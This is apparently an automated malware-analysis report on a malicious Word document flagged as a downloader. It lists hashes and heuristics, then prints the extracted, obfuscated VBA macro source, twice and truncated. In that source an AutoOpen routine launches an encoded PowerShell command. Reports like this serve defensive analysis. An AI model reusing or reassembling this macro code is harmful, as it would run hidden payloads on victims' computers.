Office (OLE) malware analysis — malicious · 7c5cd209266bb3fa

MALICIOUS

Office (OLE)

85.8 KB Created: 2018-06-11 10:07:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 574f34eb6d07329a97fea87d86396c4c SHA-1: 89975ee015728c0946d7b3a6dd8ebba0ce4801ed SHA-256: 7c5cd209266bb3fa915797d92806238343cdd159abc6a3c8a3320e2dcb7b8fb9

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers a Shell() call, which is highly indicative of downloading and executing a second-stage payload. ClamAV detection also confirms its malicious nature as a downloader.

Heuristics 7

ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9043 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9043 bytes
SHA-256: `821a0de222b4e75263e0e426640b2de5b2183bea35e0f11319a5f719753916b1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "nVZuRKEkI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function dpWzrtpPWcw() On Error Resume Next NSUCOv = CLng(58240 * CSng(PpHTjr + ChrB(XqJZB + CInt(24368)))) VWAKK = Int(kdjoS) LnMsk = oQmNp WwACi = zmlwz BElYrm = TBWjR wZMMw = HjznMF wcojbP = CLng(80216 * CSng(rfcQZ + ChrB(HWBAR + CInt(68408)))) jjnZpR = Int(QDQYTK) diVvRb = HtkwXd KwnuV = SwBGlz wnODzO = drfEA vZnDd = npFHd dpWzrtpPWcw = nsMdjqaVjU + Shell(TtZrb + Chr(LauWkaZnPDE + vbKeyP + jfJoFuYa) + "owers" + aSdZGwilRt + TCzVDcLm + ZnIWtiWAI + OKNvz, 75997 - 75997) zUVhcP = CLng(19231 * CSng(bzTij + ChrB(IQXTQi + CInt(89080)))) tsJwd = Int(JKsfl) zuswP = uhjwF WiKXS = rujkbc ilqJQ = otGzN aDAnN = vnAbzI End Function Sub Autoopen() On Error Resume Next sFoqqP = CLng(36067 * CSng(YkiDX + ChrB(sRPPf + CInt(92746)))) rjrGWC = Int(pWCmiW) AzCQj = JBTVjp CWlLT = oBWzj MmaBi = VAqsRM vAppPV = jldSl dpWzrtpPWcw SViXiC = CLng(35364 * CSng(WIizkc + ChrB(paKEY + CInt(23221)))) LzLGb = Int(obIHQ) ZASTOO = DZsGpi IrKTNM = uJiMXb Hvzaj = COWHvq IwTsVb = DwQptE End Sub Attribute VB_Name = "iqjHqnov" Function aSdZGwilRt() On Error Resume Next qFXjVE = CLng(84543 * CSng(EkwFB + ChrB(NbQhP + CInt(23600)))) KLZzzG = Int(toLdpk) sivkMn = DoOcYf OVwDMw = twlWwD QZVQQd = sUzDY HWLVba = fSMZcn LKzCD = "HeLL " + "-e IAA" + "mACgAK" + "ABnAEUAV" + "AAtAFYA" + "QQByAGkA" + "YQBiAGwAZ" + "QAgACcAKgBt" + "AEQAUgAqA" + "CcAKQAuAE4AQQ" wjJNO = CLng(68791 * CSng(mPtLH + ChrB(dVBAA + CInt(76701)))) XWnQvX = Int(AzMvn) PVJKjp = lVHRJT MJRLZ = oqbwtS WLoCzY = nHMqRK OCPVGb = AqjAVw ZKCpIVi = "BNAEUA" + "WwAz" + "AC" + "wAMQAxACwAMgBdA" + "C0" + "ASgBPAGkAT" + "gAnAC" + "cAKQAgACgAb" + "gBFAFcAL" + "QBv" ZtMRRw = CLng(35941 * CSng(jFUlo + ChrB(EzauPp + CInt(49519)))) MbmqsV = Int(ICcZq) OzZzM = oWJBVn vsFFG = Oljli GzEYCr = wXqwB DJlRCZ = DiZcC bLiVG = "AEIAagBlAEM" + "AVAAgAEk" + "ATwAuAGMATw" + "BNAHAAUgB" + "FAFMAc" + "wBJA" + "E8ATgAuA" + "EQAZQBGAEwAY" + "QB0AEUAUwB0AFIA" + "ZQBBAE0AKAA" VQbbhN = CLng(89943 * CSng(GjjwH + ChrB(JppEu + CInt(7722)))) DzdUd = Int(NXbXc) GVvWv = kGWza SvPIO = UhwmSR GDBhBi = HcBnN tvKzn = YcCiw AYMJDSwF = "gAFsAcw" + "BZAHMAdABlAG0AL" + "gBpAE" + "8ALgBtAE" + "UATQBvAHI" + "Ae" + "QBzAH" + "QAcgBlAGEATQ" JmCuW = CLng(37403 * CSng(iYoFi + ChrB(VSOtq + CInt(89883)))) uvvZXB = Int(MsVEVF) rsJMFh = jtEqbX oKiLn = KNqdX UqlDj = cwdZEh NrKBqi = djYimt KivTIsSWQp = "BdAF" + "sAQwBPAG4AdgBFA" + "FIA" + "dABdADoAOgBmAFI" + "ATwBtAGIAQQB" + "TAGUANgA0AFMAV" + "ABS" + "AGkATgB" + "HACgAJwB" lRdBjo = CLng(69479 * CSng(twqUG + ChrB(boOFBb + CInt(50383)))) ALAucs = Int(SCQqBq) zXYsAA = LLVcwC JdlRIJ = RBlMs bvZiE = worjI aioAiS = pwIZiZ ImUwVpE = "aAF" + "oAQgB2A" + "GEAdwBJAHgARABN" + "AGEALwBTAGwA" + "OABVA" hNhVmj = CLng(16031 * CSng(WQlrXn + ChrB(CSzdq + CInt(65601)))) cRWTjC = Int(SWuFLb) GVtcSw = YOnvs tqcBiL = lQzSz zEtqm = MXvzD YjXEC = YoRhbu zwFQHksD = "DcA" + "bwA1AHAAUg" + "BSAG0ARABXAFEAY" + "QBDADcAZwA4A" + "GIAagBzAEY" + "AdABpAEcATQB" WAZwqW = CLng(51982 * CSng(MwCiYB + ChrB(jMwsYA + CInt(19428)))) ihNPuL = Int(SczzPL) aFbcYL = UZiipI jjVsM = uPcGj YjZfa = XtlsRw wqJHjh = Diitd bbjrVc = "3AG" + "EAcwA" + "xADUAYwBYAGQAdA" + "BiAGEAUABuAE" + "oAbgA3ADMAZ" + "ABWAE4AZgBqAEw" + "AMABKAEo" + "AUABrA" CmrLc = CLng(40523 * CSng(HnEvuD + ChrB(ROTqRY + CInt(32987)))) ilHtY = Int(OpwfCW) lBaQwB = KlONj noPrbE = oEGDjw twGPr = MjMtaV wDzWt = noZaG lrVuAQzwjwA = "GwAegA1AE4AdwBI" + "AFIAeQB1AE" + "cAbgBiA" + "EYARABEAFIAdABP" + "ADEAdQB" + "DAEoAdQBh" + "AFYAbQBk" + "AHQAYQA4A" + "HUARgA5AEcARQAv" aSdZGwilRt = LKzCD + ZKCpIVi + bLiVG + AYMJDSwF + KivTIsSWQp + ImUwVpE + zwFQHksD + bbjrVc + lrVuAQzwjwA End Function Function TCzVDcLm() On Error Resume Next zjuhv = CLng(43196 * CSng(zibMiz + ChrB(zYHbV + CInt(33558)))) hqkHj = Int(WJfTY) K ... (truncated)

SHA-256: 821a0de222b4e75263e0e426640b2de5b2183bea35e0f11319a5f719753916b1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "nVZuRKEkI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dpWzrtpPWcw()
On Error Resume Next
NSUCOv = CLng(58240 * CSng(PpHTjr + ChrB(XqJZB + CInt(24368))))
VWAKK = Int(kdjoS)
LnMsk = oQmNp
WwACi = zmlwz
BElYrm = TBWjR
wZMMw = HjznMF
wcojbP = CLng(80216 * CSng(rfcQZ + ChrB(HWBAR + CInt(68408))))
jjnZpR = Int(QDQYTK)
diVvRb = HtkwXd
KwnuV = SwBGlz
wnODzO = drfEA
vZnDd = npFHd
dpWzrtpPWcw = nsMdjqaVjU + Shell(TtZrb + Chr(LauWkaZnPDE + vbKeyP + jfJoFuYa) + "owers" + aSdZGwilRt + TCzVDcLm + ZnIWtiWAI + OKNvz, 75997 - 75997)
zUVhcP = CLng(19231 * CSng(bzTij + ChrB(IQXTQi + CInt(89080))))
tsJwd = Int(JKsfl)
zuswP = uhjwF
WiKXS = rujkbc
ilqJQ = otGzN
aDAnN = vnAbzI
End Function
Sub Autoopen()
On Error Resume Next
sFoqqP = CLng(36067 * CSng(YkiDX + ChrB(sRPPf + CInt(92746))))
rjrGWC = Int(pWCmiW)
AzCQj = JBTVjp
CWlLT = oBWzj
MmaBi = VAqsRM
vAppPV = jldSl
dpWzrtpPWcw
SViXiC = CLng(35364 * CSng(WIizkc + ChrB(paKEY + CInt(23221))))
LzLGb = Int(obIHQ)
ZASTOO = DZsGpi
IrKTNM = uJiMXb
Hvzaj = COWHvq
IwTsVb = DwQptE
End Sub


Attribute VB_Name = "iqjHqnov"
Function aSdZGwilRt()
On Error Resume Next
qFXjVE = CLng(84543 * CSng(EkwFB + ChrB(NbQhP + CInt(23600))))
KLZzzG = Int(toLdpk)
sivkMn = DoOcYf
OVwDMw = twlWwD
QZVQQd = sUzDY
HWLVba = fSMZcn
LKzCD = "HeLL " + "-e IAA" + "mACgAK" + "ABnAEUAV" + "AAtAFYA" + "QQByAGkA" + "YQBiAGwAZ" + "QAgACcAKgBt" + "AEQAUgAqA" + "CcAKQAuAE4AQQ"
wjJNO = CLng(68791 * CSng(mPtLH + ChrB(dVBAA + CInt(76701))))
XWnQvX = Int(AzMvn)
PVJKjp = lVHRJT
MJRLZ = oqbwtS
WLoCzY = nHMqRK
OCPVGb = AqjAVw
ZKCpIVi = "BNAEUA" + "WwAz" + "AC" + "wAMQAxACwAMgBdA" + "C0" + "ASgBPAGkAT" + "gAnAC" + "cAKQAgACgAb" + "gBFAFcAL" + "QBv"
ZtMRRw = CLng(35941 * CSng(jFUlo + ChrB(EzauPp + CInt(49519))))
MbmqsV = Int(ICcZq)
OzZzM = oWJBVn
vsFFG = Oljli
GzEYCr = wXqwB
DJlRCZ = DiZcC
bLiVG = "AEIAagBlAEM" + "AVAAgAEk" + "ATwAuAGMATw" + "BNAHAAUgB" + "FAFMAc" + "wBJA" + "E8ATgAuA" + "EQAZQBGAEwAY" + "QB0AEUAUwB0AFIA" + "ZQBBAE0AKAA"
VQbbhN = CLng(89943 * CSng(GjjwH + ChrB(JppEu + CInt(7722))))
DzdUd = Int(NXbXc)
GVvWv = kGWza
SvPIO = UhwmSR
GDBhBi = HcBnN
tvKzn = YcCiw
AYMJDSwF = "gAFsAcw" + "BZAHMAdABlAG0AL" + "gBpAE" + "8ALgBtAE" + "UATQBvAHI" + "Ae" + "QBzAH" + "QAcgBlAGEATQ"
JmCuW = CLng(37403 * CSng(iYoFi + ChrB(VSOtq + CInt(89883))))
uvvZXB = Int(MsVEVF)
rsJMFh = jtEqbX
oKiLn = KNqdX
UqlDj = cwdZEh
NrKBqi = djYimt
KivTIsSWQp = "BdAF" + "sAQwBPAG4AdgBFA" + "FIA" + "dABdADoAOgBmAFI" + "ATwBtAGIAQQB" + "TAGUANgA0AFMAV" + "ABS" + "AGkATgB" + "HACgAJwB"
lRdBjo = CLng(69479 * CSng(twqUG + ChrB(boOFBb + CInt(50383))))
ALAucs = Int(SCQqBq)
zXYsAA = LLVcwC
JdlRIJ = RBlMs
bvZiE = worjI
aioAiS = pwIZiZ
ImUwVpE = "aAF" + "oAQgB2A" + "GEAdwBJAHgARABN" + "AGEALwBTAGwA" + "OABVA"
hNhVmj = CLng(16031 * CSng(WQlrXn + ChrB(CSzdq + CInt(65601))))
cRWTjC = Int(SWuFLb)
GVtcSw = YOnvs
tqcBiL = lQzSz
zEtqm = MXvzD
YjXEC = YoRhbu
zwFQHksD = "DcA" + "bwA1AHAAUg" + "BSAG0ARABXAFEAY" + "QBDADcAZwA4A" + "GIAagBzAEY" + "AdABpAEcATQB"
WAZwqW = CLng(51982 * CSng(MwCiYB + ChrB(jMwsYA + CInt(19428))))
ihNPuL = Int(SczzPL)
aFbcYL = UZiipI
jjVsM = uPcGj
YjZfa = XtlsRw
wqJHjh = Diitd
bbjrVc = "3AG" + "EAcwA" + "xADUAYwBYAGQAdA" + "BiAGEAUABuAE" + "oAbgA3ADMAZ" + "ABWAE4AZgBqAEw" + "AMABKAEo" + "AUABrA"
CmrLc = CLng(40523 * CSng(HnEvuD + ChrB(ROTqRY + CInt(32987))))
ilHtY = Int(OpwfCW)
lBaQwB = KlONj
noPrbE = oEGDjw
twGPr = MjMtaV
wDzWt = noZaG
lrVuAQzwjwA = "GwAegA1AE4AdwBI" + "AFIAeQB1AE" + "cAbgBiA" + "EYARABEAFIAdABP" + "ADEAdQB" + "DAEoAdQBh" + "AFYAbQBk" + "AHQAYQA4A" + "HUARgA5AEcARQAv"
aSdZGwilRt = LKzCD + ZKCpIVi + bLiVG + AYMJDSwF + KivTIsSWQp + ImUwVpE + zwFQHksD + bbjrVc + lrVuAQzwjwA
End Function
Function TCzVDcLm()
On Error Resume Next
zjuhv = CLng(43196 * CSng(zibMiz + ChrB(zYHbV + CInt(33558))))
hqkHj = Int(WJfTY)
K
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.